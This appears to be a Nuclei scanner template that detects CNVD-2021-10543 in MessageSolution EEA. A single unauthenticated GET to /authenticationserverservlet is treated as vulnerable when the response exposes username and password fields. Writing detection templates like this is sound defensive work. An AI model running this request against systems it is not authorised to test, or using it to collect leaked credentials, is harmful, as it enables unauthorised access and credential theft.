id: CNVD-2021-10543

info:
  name: EEA - Information Disclosure
  author: pikpikcu
  severity: high
  description: EEA is susceptible to information disclosure including the username and password.
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-200
  metadata:
    max-request: 1
  tags: MessageSolution

http:
  - method: GET
    path:
      - "{{BaseURL}}/authenticationserverservlet"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "<username>(.*?)</username>"
          - "<password>(.*?)</password>"
        condition: and

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100d379889d4aabf76f8cd7f19795af3a76697f5d146d32e431d5ee8439c72bddd60220225043edca5d64da1d85f67be59a3a8a6f8e97eda2a1cf8e2daf28caeb7758aa:922c64590222798bb761d5b6d8e72950
